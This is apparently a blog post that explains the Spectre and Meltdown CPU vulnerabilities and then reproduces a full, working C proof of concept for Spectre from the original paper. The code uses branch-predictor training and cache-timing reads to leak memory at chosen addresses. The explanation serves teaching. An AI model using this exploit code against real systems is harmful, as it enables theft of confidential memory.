What are Spectre and Meltdown, and why should you care?

Vidura Supun Ehalapitiya · February 9, 2019

January 2018 was not a good month for major CPU designers such as ARM, AMD and especially Intel, because researchers disclosed two vulnerabilities named Spectre and Meltdown. Scary as they sound, these vulnerabilities managed to stay hidden from us for about 20 years. Before we get a bit technical, think about it like this:

You want to see the new iPhone model before its official release, so you try to get inside Apple's offices. No luck: security will not let you through. But you know that Apple engineers are allowed to use and test the phone, so you sit outside and watch until an engineer comes out using the new phone.

These vulnerabilities are a by-product of two features that modern CPUs come equipped with, speculative execution and caching, both of which help the CPU get things done faster.

What is Speculative Execution?

When a program reaches a branch, the CPU does not wait to find out which path is the right one. The branch predictor guesses the most likely path, and the CPU starts executing it ahead of time so that the answer is ready as soon as the condition is resolved. This prevents a pipeline stall, or execution delay. If the guess turns out to be wrong, the speculative work is thrown away. As an example:

IF(A) Print (A) ELSE Print(B)

Here the CPU may start executing Print(A) or Print(B) before it has finished testing whether A is true. It does not have to be a simple logical branch either: the CPU also guesses which functions the program is most likely to execute next and keeps their results ready.

What is a Cache?

When the CPU needs some data, fetching it from RAM is slow, because RAM is a separate component located outside the CPU. A cache is a small storage area inside the CPU that can be accessed considerably faster than RAM and is used to hold the things the CPU needs often. When the CPU needs something, it looks in the cache first: if the data is there we call it a cache hit, otherwise a cache miss. In our scenario, what ends up in the cache is data touched during speculative execution, and it stays there even when the speculative work itself is thrown away. The problem arises when these two features interact with memory protection.

Memory protection?

Memory protection prevents a program from accessing memory that belongs to another process, or to the operating system, without authorization. Whenever a process tries to access data, the access has to pass a privilege check.

Now that we have covered the basic background for Spectre and Meltdown, it is time to get to them.

Spectre


Using Spectre, an attacker can trick a program into revealing data it should keep confidential. The attacker relies on cache side-channel techniques such as Flush+Reload and Evict+Reload: first the probed cache lines are flushed (or evicted) from the cache, then the victim is made to speculatively load a cache line whose address depends on the secret, and finally the attacker reads the probed memory and times each read. A cache hit is noticeably faster than a cache miss, so the timing tells the attacker which line the victim touched, and from that the secret value. This vulnerability affects almost all CPUs that use speculative, out-of-order execution.

Meltdown


Meltdown affects Intel and Apple processors. It allows an attacker who can run a program on a system to read memory they should have no access to, including kernel memory, bypassing memory protection. In some cloud setups this can be used to read data belonging to other virtual machines on the same host without any permission or privilege.

This is an example implementation of the Spectre attack in C:

 


    /*********************************************************************
    *
    * Spectre PoC
    *
    * This source code originates from the example code provided in the
    * "Spectre Attacks: Exploiting Speculative Execution" paper found at
    * https://spectreattack.com/spectre.pdf
    *
    * Minor modifications have been made to fix compilation errors and
    * improve documentation where possible.
    *
    **********************************************************************/

    #include <stdio.h>
    #include <stdint.h>
    #include <string.h>
    #ifdef _MSC_VER
    #include <intrin.h> /* for rdtsc, rdtscp, clflush */
    #pragma optimize("gt",on)
    #else
    #include <x86intrin.h> /* for rdtsc, rdtscp, clflush */
    #endif /* ifdef _MSC_VER */

    /* Automatically detect if SSE2 is not available when SSE is advertised */
    #ifdef _MSC_VER
    /* MSC */
    #if _M_IX86_FP==1
    #define NOSSE2
    #endif
    #else
    /* Not MSC */
    #if defined(__SSE__) && !defined(__SSE2__)
    #define NOSSE2
    #endif
    #endif /* ifdef _MSC_VER */

    #ifdef NOSSE2
    #define NORDTSCP
    #define NOMFENCE
    #define NOCLFLUSH
    #endif

    /********************************************************************
    Victim code.
    ********************************************************************/
    unsigned int array1_size = 16;
    uint8_t unused1[64];
    uint8_t array1[16] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
    uint8_t unused2[64];
    uint8_t array2[256 * 512];

    char * secret = "The Magic Words are Squeamish Ossifrage.";

    uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */

    #ifdef LINUX_KERNEL_MITIGATION
    /* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27 */
    /**
     * array_index_mask_nospec() - generate a mask that is ~0UL when the
     *   bounds check succeeds and 0 otherwise
     * @index: array element index
     * @size: number of elements in array
     *
     * Returns:
     *     0 - (index < size)
     */
    static inline unsigned long array_index_mask_nospec(unsigned long index,
        unsigned long size)
    {
      unsigned long mask;

      __asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
          :"=r" (mask)
          :"g"(size),"r" (index)
          :"cc");
      return mask;
    }
    #endif

    void victim_function(size_t x) {
      if (x < array1_size) {
    #ifdef INTEL_MITIGATION
        /*
         * According to Intel et al, the best way to mitigate this is to
         * add a serializing instruction after the boundary check to force
         * the retirement of previous instructions before proceeding to
         * the read.
         * See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
         */
        _mm_lfence();
    #endif
    #ifdef LINUX_KERNEL_MITIGATION
        x &= array_index_mask_nospec(x, array1_size);
    #endif
        temp &= array2[array1[x] * 512];
      }
    }

    /********************************************************************
    Analysis code
    ********************************************************************/
    #ifdef NOCLFLUSH
    #define CACHE_FLUSH_ITERATIONS 2048
    #define CACHE_FLUSH_STRIDE 4096
    uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];

    /* Flush memory using long SSE instructions */
    void flush_memory_sse(uint8_t * addr)
    {
      float * p = (float *)addr;
      float c = 0.f;
      __m128 i = _mm_setr_ps(c, c, c, c);

      int k, l;
      /* Non-sequential memory addressing by looping through k by l */
      for (k = 0; k < 4; k++)
        for (l = 0; l < 4; l++)
          _mm_stream_ps(&p[(l * 4 + k) * 4], i);
    }
    #endif

    /* Report best guess in value[0] and runner-up in value[1] */
    void readMemoryByte(int cache_hit_threshold, size_t malicious_x,
        uint8_t value[2], int score[2]) {
      static int results[256];
      int tries, i, j, k, mix_i;
      unsigned int junk = 0;
      size_t training_x, x;
      register uint64_t time1, time2;
      volatile uint8_t * addr;

    #ifdef NOCLFLUSH
      int junk2 = 0;
      int l;
      (void)junk2;
    #endif

      for (i = 0; i < 256; i++)
        results[i] = 0;
      for (tries = 999; tries > 0; tries--) {

    #ifndef NOCLFLUSH
        /* Flush array2[512*(0..255)] from cache */
        for (i = 0; i < 256; i++)
          _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */
    #else
        /* Flush array2[512*(0..255)] from cache
           using long SSE instruction several times */
        for (j = 0; j < 16; j++)
          for (i = 0; i < 256; i++)
            flush_memory_sse( & array2[i * 512]);
    #endif

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;
        for (j = 29; j >= 0; j--) {
    #ifndef NOCLFLUSH
          _mm_clflush( & array1_size);
    #else
          /* Alternative to using clflush to flush the CPU cache:
             read addresses at 4096-byte intervals out of a large array.
             Do this around 2000 times, or more depending on CPU cache size. */
          for (l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l -= CACHE_FLUSH_STRIDE) {
            junk2 = cache_flush_array[l];
          }
    #endif

          /* Delay (can also mfence) */
          for (volatile int z = 0; z < 100; z++) {}

          /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
          /* Avoid jumps in case those tip off the branch predictor */
          x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
          x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
          x = training_x ^ (x & (malicious_x ^ training_x));

          /* Call the victim! */
          victim_function(x);

        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++) {
          mix_i = ((i * 167) + 13) & 255;
          addr = & array2[mix_i * 512];

          /*
          We need to accurately measure the memory access to the current index of the
          array so we can determine which index was cached by the malicious mispredicted code.

          The best way to do this is to use the rdtscp instruction, which measures current
          processor ticks, and is also serialized.
          */

    #ifndef NORDTSCP
          time1 = __rdtscp( & junk); /* READ TIMER */
          junk = * addr; /* MEMORY ACCESS TO TIME */
          time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
    #else

          /*
          The rdtscp instruction was introduced with the x86-64 extensions.
          Many older 32-bit processors won't support this, so we need to use
          the equivalent but non-serialized rdtsc instruction instead.
          */

    #ifndef NOMFENCE
          /*
          Since the rdtsc instruction isn't serialized, newer processors will try to
          reorder it, ruining its value as a timing mechanism.
          To get around this, we use the mfence instruction to introduce a memory
          barrier and force serialization. mfence is used because it is portable across
          Intel and AMD.
          */

          _mm_mfence();
          time1 = __rdtsc(); /* READ TIMER */
          _mm_mfence();
          junk = * addr; /* MEMORY ACCESS TO TIME */
          _mm_mfence();
          time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
          _mm_mfence();
    #else
          /*
          The mfence instruction was introduced with the SSE2 instruction set, so
          we have to ifdef it out on pre-SSE2 processors.
          Luckily, these older processors don't seem to reorder the rdtsc instruction,
          so not having mfence on older processors is less of an issue.
          */

          time1 = __rdtsc(); /* READ TIMER */
          junk = * addr; /* MEMORY ACCESS TO TIME */
          time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
    #endif
    #endif
          if ((int)time2 <= cache_hit_threshold && mix_i != array1[tries % array1_size])
            results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest & second-highest results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++) {
          if (j < 0 || results[i] >= results[j]) {
            k = j;
            j = i;
          } else if (k < 0 || results[i] >= results[k]) {
            k = i;
          }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
          break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
      }
      results[0] ^= junk; /* use junk so code above won't get optimized out */
      value[0] = (uint8_t) j;
      score[0] = results[j];
      value[1] = (uint8_t) k;
      score[1] = results[k];
    }

    /*
    *  Command line arguments:
    *  1: Cache hit threshold (int)
    *  2: Malicious address start (size_t)
    *  3: Malicious address count (int)
    */
    int main(int argc, const char * * argv) {

      /* Default to a cache hit threshold of 80 */
      int cache_hit_threshold = 80;

      /* Default for malicious_x is the secret string address */
      size_t malicious_x = (size_t)(secret - (char * ) array1);

      /* Default addresses to read is 40 (which is the length of the secret string) */
      int len = 40;

      int score[2];
      uint8_t value[2];
      int i;

    #ifdef NOCLFLUSH
      for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
        cache_flush_array[i] = 1;
      }
    #endif

      for (i = 0; i < (int)sizeof(array2); i++) {
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
      }

      /* Parse the cache_hit_threshold from the first command line argument.
         (OPTIONAL) */
      if (argc >= 2) {
        sscanf(argv[1], "%d", &cache_hit_threshold);
      }

      /* Parse the malicious x address and length from the second and third
         command line argument. (OPTIONAL) */
      if (argc >= 4) {
        sscanf(argv[2], "%p", (void * * )( &malicious_x));

        /* Convert input value into a pointer */
        malicious_x -= (size_t) array1;

        sscanf(argv[3], "%d", &len);
      }

      /* Print git commit hash */
    #ifdef GIT_COMMIT_HASH
      printf("Version: commit " GIT_COMMIT_HASH "\n");
    #endif

      /* Print cache hit threshold */
      printf("Using a cache hit threshold of %d.\n", cache_hit_threshold);

      /* Print build configuration */
      printf("Build: ");
    #ifndef NORDTSCP
      printf("RDTSCP_SUPPORTED ");
    #else
      printf("RDTSCP_NOT_SUPPORTED ");
    #endif
    #ifndef NOMFENCE
      printf("MFENCE_SUPPORTED ");
    #else
      printf("MFENCE_NOT_SUPPORTED ");
    #endif
    #ifndef NOCLFLUSH
      printf("CLFLUSH_SUPPORTED ");
    #else
      printf("CLFLUSH_NOT_SUPPORTED ");
    #endif
    #ifdef INTEL_MITIGATION
      printf("INTEL_MITIGATION_ENABLED ");
    #else
      printf("INTEL_MITIGATION_DISABLED ");
    #endif
    #ifdef LINUX_KERNEL_MITIGATION
      printf("LINUX_KERNEL_MITIGATION_ENABLED ");
    #else
      printf("LINUX_KERNEL_MITIGATION_DISABLED ");
    #endif

      printf("\n");

      printf("Reading %d bytes:\n", len);

      /* Start the read loop to read each address */
      while (--len >= 0) {
        printf("Reading at malicious_x = %p... ", (void * ) malicious_x);

        /* Call readMemoryByte with the required cache hit threshold and
           malicious x address. value and score are arrays that are
           populated with the results. */
        readMemoryByte(cache_hit_threshold, malicious_x++, value, score);

        /* Display the results */
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
        printf("0x%02X='%c' score=%d ", value[0],
            (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);

        if (score[1] > 0) {
          printf("(second best: 0x%02X='%c' score=%d)", value[1],
              (value[1] > 31 && value[1] < 127 ? value[1] : '?'), score[1]);
        }

        printf("\n");
      }
      return (0);
    }
